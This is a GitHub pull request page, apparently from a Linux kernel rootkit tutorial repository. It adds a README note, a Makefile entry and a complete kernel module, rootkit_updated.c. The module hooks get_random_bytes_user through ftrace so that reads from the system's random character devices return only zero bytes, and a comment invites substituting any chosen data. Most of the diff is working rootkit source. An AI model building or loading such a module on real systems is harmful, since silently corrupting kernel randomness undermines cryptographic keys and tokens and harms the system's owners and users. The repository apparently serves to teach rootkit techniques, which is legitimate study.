Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update module 3.7 #21

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion 3_RootkitTechniques/3.7_char_interfering/Makefile
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
obj-m += rootkit.o
obj-m += rootkit.o rootkit_updated.o

all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
Expand Down
4 changes: 4 additions & 0 deletions 3_RootkitTechniques/3.7_char_interfering/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -19,3 +19,7 @@ To use:
* Unload with `rmmod rootkit`

![random](./random.png "Interfering with char devices")

Additionally, since the linux kernel commits [torvalds/linux@22b0a22](https://github.com/torvalds/linux/commit/22b0a222af4df8ee9bb8e07013ab44da9511b047) and [torvalds/linux@1b388e7](https://github.com/torvalds/linux/commit/1b388e7765f2eaa137cf5d92b47ef5925ad83ced) the `function_operations` read and write fields have changed to `read_iter` and `write_iter`, respectively. In th interest of maintaining a working example, there is an updated module, `rootkit_updated` that patches the `get_random_bytes_user` function underlying the read calls to both char devices.

![random_updated](./random_updated.png "Returning 0x00 for every byte read")
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
78 changes: 78 additions & 0 deletions 3_RootkitTechniques/3.7_char_interfering/rootkit_updated.c
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/version.h>
#include <linux/syscalls.h>
#include <linux/namei.h>
#include <linux/fs.h>
#include <linux/uio.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("TheXcellerator-&-m3ta");
MODULE_DESCRIPTION("get_random_bytes_user hook");
MODULE_VERSION("0.0.1");

#define BLOCKSIZE 32

static asmlinkage ssize_t (*orig_get_random_bytes_user)(struct iov_iter *iter);

asmlinkage ssize_t get_random_bytes_user_hook(struct iov_iter *iter) {
u8 block[BLOCKSIZE];
size_t ret = 0, i, copied;

// mess with this loop to load any data you'd like
for(i = 0; i < BLOCKSIZE; i++)
block[i] = 0;

if(!iov_iter_count(iter))
return 0;

if(iov_iter_count(iter) <= BLOCKSIZE) {
ret = copy_to_iter(block, BLOCKSIZE, iter);
goto fn_exit;
}

for(;;) {
copied = copy_to_iter(block, sizeof(block), iter);
ret += copied;
if(!iov_iter_count(iter) || copied != sizeof(block))
break;

BUILD_BUG_ON(PAGE_SIZE % sizeof(block) != 0);
if(ret % PAGE_SIZE == 0) {
if(signal_pending(current))
break;
cond_resched();
}
}

//uncomment if you change the loop above
//memzero_explicit(block, sizeof(block));
fn_exit:
return ret ? ret : -EFAULT;
}

static struct ftrace_hook hooks[] = {
HOOK("get_random_bytes_user", get_random_bytes_user_hook, &orig_get_random_bytes_user),
};

static int __init rootkit_init(void) {
int err;
err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
if(err)
return err;

printk(KERN_INFO "rootkit: loaded\n");
return 0;
}

static void __exit rootkit_exit(void) {
fh_remove_hooks(hooks, ARRAY_SIZE(hooks));

printk(KERN_INFO "rootkit: unloaded\n");
}

module_init(rootkit_init);
module_exit(rootkit_exit);